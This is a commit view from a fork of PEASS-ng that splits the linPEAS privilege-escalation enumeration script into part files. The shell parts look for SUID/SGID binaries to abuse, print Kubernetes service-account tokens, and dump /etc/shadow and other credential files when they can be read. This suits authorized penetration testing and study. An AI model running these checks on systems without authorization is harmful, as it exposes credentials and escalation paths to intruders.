darnellkeith/PEASS-ng
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

separated linpeas

Browse Source
This commit is contained in:
carlospolop 2021-12-18 14:48:01 -05:00
parent ff55ae4dae
commit b5bb7242c9
16 changed files with 4484 additions and 4498 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
CONTRIBUTING.md
View File

@ -13,7 +13,7 @@ If you want to **contribute adding the search of new files that can contain sens
Also, in the comments of this PR, put links to pages where and example of the file containing sensitive information can be foud. Also, in the comments of this PR, put links to pages where and example of the file containing sensitive information can be foud.
## Specific LinPEAS additions ## Specific LinPEAS additions
From the PEASS-ng release **linpeas is auto-build from [linpeas_base.sh](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/builder/linpeas_base.sh)**. Therefore, if you want to contribute adding any new check for linpeas/macpeas, please **add it in this file and create a PR to master**. From the PEASS-ng release **linpeas is auto-build from [linpeas/builder](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/builder/)**. Therefore, if you want to contribute adding any new check for linpeas/macpeas, please **add it in this directory and create a PR to master**. *Note that some code is auto-generated in the python but most of it it's just written in different files that willbe merged into linpeas.sh*.
The new linpeas.sh script will be auto-generated in the PR. The new linpeas.sh script will be auto-generated in the PR.
## Specific WinPEAS additions ## Specific WinPEAS additions

17
build_lists/sensitive_files.yaml
View File

@ -65,6 +65,8 @@ common_directory_folders:
- /usr - /usr
- /var - /var
peas_checks: "peass{CHECKS}"
peas_extrasections_markup: "peass{EXTRA_SECTIONS}" peas_extrasections_markup: "peass{EXTRA_SECTIONS}"
peas_finds_markup: "peass{FINDS_HERE}" peas_finds_markup: "peass{FINDS_HERE}"
@ -2395,6 +2397,21 @@ search:
search_in: search_in:
- common - common
- name: Jetty
value:
config:
auto_check: True
files:
- name: "jetty-realm.properties"
value:
bad_regex: ".*"
remove_empty_lines: True
remove_regex: '^#'
type: f
search_in:
- common
- name: Wget - name: Wget
value: value:
config: config:

8
linPEAS/builder/linpeas_builder.py
View File

@ -1,5 +1,6 @@
from .src.peasLoaded import PEASLoaded from .src.peasLoaded import PEASLoaded
from .src.linpeasBuilder import LinpeasBuilder from .src.linpeasBuilder import LinpeasBuilder
from .src.linpeasBaseBuilder import LinpeasBaseBuilder
from .src.yamlGlobals import FINAL_LINPEAS_PATH from .src.yamlGlobals import FINAL_LINPEAS_PATH
import os import os
@ -7,7 +8,14 @@ import stat
#python3 -m builder.linpeas_builder #python3 -m builder.linpeas_builder
def main(): def main():
# Load configuration
ploaded = PEASLoaded() ploaded = PEASLoaded()
# Build temporary linpeas_base.sh file
lbasebuilder = LinpeasBaseBuilder()
lbasebuilder.build()
# Build final linpeas.sh
lbuilder = LinpeasBuilder(ploaded) lbuilder = LinpeasBuilder(ploaded)
lbuilder.build() lbuilder.build()
lbuilder.write_linpeas(FINAL_LINPEAS_PATH) lbuilder.write_linpeas(FINAL_LINPEAS_PATH)

39
linPEAS/builder/linpeas_parts/available_software.sh Normal file
View File

@ -0,0 +1,39 @@
###########################################
#---------) Available Software (----------#
###########################################
#-- 1AS) Useful software
print_2title "Useful software"
command -v "$CONTAINER_CMDS" nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch ctr authbind 2>/dev/null
echo ""
#-- 2AS) Search for compilers
print_2title "Installed Compiler"
(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/");
echo ""
if [ "$(command -v pkg 2>/dev/null)" ]; then
print_2title "Vulnerable Packages"
pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g"
echo ""
fi
if [ "$(command -v brew 2>/dev/null)" ]; then
print_2title "Brew Installed Packages"
brew list
echo ""
fi
if [ "$MACPEAS" ]; then
print_2title "Writable Installed Applications"
system_profiler SPApplicationsDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do
if [ -w "$f" ]; then
echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g"
fi
done
system_profiler SPFrameworksDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do
if [ -w "$f" ]; then
echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g"
fi
done

95
linPEAS/builder/linpeas_parts/container.sh Normal file
View File

@ -0,0 +1,95 @@
##############################################
#---------------) Containers (---------------#
##############################################
containerCheck
print_2title "Container related tools present"
command -v "$CONTAINER_CMDS"
print_2title "Container details"
print_list "Is this a container? ...........$NC $containerType"
print_list "Any running containers? ........ "$NC
# Get counts of running containers for each platform
dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l)
podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l)
lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l)
rktcontainers=$(rkt list 2>/dev/null | tail -n +2 | wc -l)
if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then
echo_no
else
containerCounts=""
if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi
if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi
if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi
if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi
echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED},"
# List any running containers
if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi
if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi
if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi
if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi
fi
#If docker
if echo "$containerType" | grep -qi "docker"; then
print_2title "Docker Container details"
inDockerGroup
print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
print_list "Looking and enumerating Docker Sockets\n"$NC
enumerateDockerSockets
print_list "Docker version .................$NC$dockerVersion"
checkDockerVersionExploits
print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
if [ "$inContainer" ]; then
checkDockerRootless
print_list "Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN},"
fi
if df -h | grep docker; then
print_2title "Docker Overlays"
df -h | grep docker
fi
fi
if [ "$inContainer" ]; then
echo ""
print_2title "Container & breakout enumeration"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout"
print_list "Container ID ...................$NC $(cat /etc/hostname)"
if echo "$containerType" | grep -qi "docker"; then
print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n"
fi
if echo "$containerType" | grep -qi "kubernetes"; then
print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n"
print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n"
fi
checkContainerExploits
print_list "Vulnerable to CVE-2019-5021 .. $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
echo ""
print_2title "Container Capabilities"
capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g"
echo ""
print_2title "Privilege Mode"
if [ -x "$(command -v fdisk)" ]; then
if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then
echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW},"
else
echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN},"
fi
else
echo_not_found
fi
echo ""
print_2title "Interesting Files Mounted"
(mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS"
echo ""
print_2title "Possible Entrypoints"
ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq
echo ""
fi

639
linPEAS/builder/linpeas_parts/interesting_files.sh Normal file
View File

@ -0,0 +1,639 @@
###########################################
#----------) Interesting files (----------#
###########################################
##-- IF) SUID
print_2title "SUID - Check easy privesc, exploits and write perms"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid"
if ! [ "$STRINGS" ]; then
echo_not_found "strings"
fi
if ! [ "$STRACE" ]; then
echo_not_found "strace"
fi
suids_files=$(find / -perm -4000 -type f ! -path "/dev/*" 2>/dev/null)
for s in $suids_files; do
s=$(ls -lahtr "$s")
#If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder
if echo "$s" | grep -qE "^total"; then break; fi
sname="$(echo $s | awk '{print $9}')"
if [ "$sname" = "." ] || [ "$sname" = ".." ]; then
true #Don't do nothing
elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then
echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED},"
elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits)
echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW},"
else
c="a"
for b in $sidB; do
if echo $s | grep -q $(echo $b | cut -d % -f 1); then
echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m,"
c=""
break;
fi
done;
if [ "$c" ]; then
if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then
echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW},"
else
echo "$s (Unknown SUID binary)" | sed -${E} "s,/.*,${SED_RED},"
printf $ITALIC
if ! [ "$FAST" ] && [ "$STRINGS" ]; then
$STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do
sline_first="$(echo "$sline" | cut -d ' ' -f1)"
if echo "$sline_first" | grep -qEv "$cfuncs"; then
if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path
if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable
printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n"
fi
else #If not a path
if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary
printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n"
fi
fi
fi
done
if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then
printf $ITALIC
echo "----------------------------------------------------------------------------------------"
echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..."
OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH
export LD_LIBRARY_PATH=""
timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g"
printf $NC
export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH
echo "----------------------------------------------------------------------------------------"
echo ""
fi
fi
fi
fi
fi
done;
echo ""
##-- IF) SGID
print_2title "SGID"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid"
sgids_files=$(find / -perm -2000 -type f ! -path "/dev/*" 2>/dev/null)
for s in $sgids_files; do
s=$(ls -lahtr "$s")
#If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder
if echo "$s" | grep -qE "^total";then break; fi
sname="$(echo $s | awk '{print $9}')"
if [ "$sname" = "." ] || [ "$sname" = ".." ]; then
true #Don't do nothing
elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then
echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED},"
elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits)
echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW},"
else
c="a"
for b in $sidB; do
if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then
echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m,"
c=""
break;
fi
done;
if [ "$c" ]; then
if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then
echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW},"
else
echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED},"
printf $ITALIC
if ! [ "$FAST" ] && [ "$STRINGS" ]; then
$STRINGS "$sname" | sort | uniq | while read sline; do
sline_first="$(echo $sline | cut -d ' ' -f1)"
if echo "$sline_first" | grep -qEv "$cfuncs"; then
if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path
if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable
printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n"
fi
else #If not a path
if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary
printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n"
fi
fi
fi
done
if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then
printf "$ITALIC"
echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..."
timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g"
printf "$NC"
echo ""
fi
fi
fi
fi
fi
done;
echo ""
##-- IF) Misconfigured ld.so
print_2title "Checking misconfigurations of ld.so"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so"
printf $ITALIC"/etc/ld.so.conf\n"$NC;
cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
cat /etc/ld.so.conf 2>/dev/null | while read l; do
if echo "$l" | grep -q include; then
ini_path=$(echo "$l" | cut -d " " -f 2)
fpath=$(dirname "$ini_path")
if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
for f in $fpath/*; do
printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
done
fi
done
echo ""
##-- IF) Capabilities
print_2title "Capabilities"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities"
echo "Current capabilities:"
(capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${SED_RED_YELLOW}," ) || echo_not_found "capsh"
(cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status"
echo ""
echo "Shell capabilities:"
(capsh --decode=0x"$(cat /proc/$PPID/status 2>/dev/null | grep CapEff | awk '{print $2}')" 2>/dev/null) || echo_not_found "capsh"
(cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status"
echo ""
echo "Files with capabilities (limited to 50):"
getcap -r / 2>/dev/null | head -n 50 | while read cb; do
capsVB_vuln=""
for capVB in $capsVB; do
capname="$(echo $capVB | cut -d ':' -f 1)"
capbins="$(echo $capVB | cut -d ':' -f 2)"
if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then
echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW},"
capsVB_vuln="1"
break
fi
done
if ! [ "$capsVB_vuln" ]; then
echo "$cb" | sed -${E} "s,$capsB,${SED_RED},"
fi
if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then
echo "$cb is writable" | sed -${E} "s,.*,${SED_RED},"
fi
done
echo ""
##-- IF) Users with capabilities
print_2title "Users with capabilities"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities"
if [ -f "/etc/security/capability.conf" ]; then
grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED},"
else echo_not_found "/etc/security/capability.conf"
fi
echo ""
##-- IF) Files with ACLs
print_2title "Files with ACLs (limited to 50)"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls"
( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED},"
if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$(command -v getfacl)" ]; then #Find ACL files in macos (veeeery slow)
ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED},"
fi
echo ""
##-- IF) Files with ResourceFork
#if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then # TOO SLOW, CHECK IT LATER
# print_2title "Files with ResourceFork"
# print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#resource-forks-or-macos-ads"
# find $HOMESEARCH -type f -exec ls -ld {} \; 2>/dev/null | grep -E ' [x\-]@ ' | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork"
#fi
#echo ""
##-- IF) .sh files in PATH
print_2title ".sh files in path"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path"
echo $PATH | tr ":" "\n" | while read d; do
for f in $(find "$d" -name "*.sh" 2>/dev/null); do
if ! [ "$IAMROOT" ] && [ -O "$f" ]; then
echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED},"
elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits)
echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW},"
else
echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},";
fi
done
done
echo ""
print_2title "Broken links in path"
echo $PATH | tr ":" "\n" | while read d; do
find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E} "s,broken,${SED_RED},";
done
echo ""
if [ "$MACPEAS" ]; then
print_2title "Unsigned Applications"
macosNotSigned /System/Applications
fi
##-- IF) Unexpected folders in /
print_2title "Unexpected in root"
if [ "$MACPEAS" ]; then
(find / -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found
else
(find / -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found
fi
echo ""
##-- IF) Files (scripts) in /etc/profile.d/
print_2title "Files (scripts) in /etc/profile.d/"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files"
if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS
(ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/"
if ! [ "$IAMROOT" ] && [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
if ! [ "$IAMROOT" ] && [ -w "/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
if ! [ "$IAMROOT" ] && [ "$(find /etc/profile.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/profile.d/ '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
fi
echo ""
##-- IF) Files (scripts) in /etc/init.d/
print_2title "Permissions in init, init.d, systemd, and rc.d"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d"
if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS
if ! [ "$IAMROOT" ] && [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
if ! [ "$IAMROOT" ] && [ "$(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
if ! [ "$IAMROOT" ] && [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
if ! [ "$IAMROOT" ] && [ "$(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
if ! [ "$IAMROOT" ] && [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
if ! [ "$IAMROOT" ] && [ "$(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
if ! [ "$IAMROOT" ] && [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
if ! [ "$IAMROOT" ] && [ "$(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
if ! [ "$IAMROOT" ] && [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
if ! [ "$IAMROOT" ] && [ "$(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
fi
echo ""
##-- IF) Hashes in passwd file
print_list "Hashes inside passwd file? ........... "
if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
else echo_no
fi
##-- IF) Writable in passwd file
print_list "Writable passwd file? ................ "
if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW},"
elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW},"
elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW},"
else echo_no
fi
##-- IF) Credentials in fstab
print_list "Credentials in fstab/mtab? ........... "
if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
else echo_no
fi
##-- IF) Read shadow files
print_list "Can I read shadow files? ............. "
if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
else echo_no
fi
print_list "Can I read shadow plists? ............ "
possible_check=""
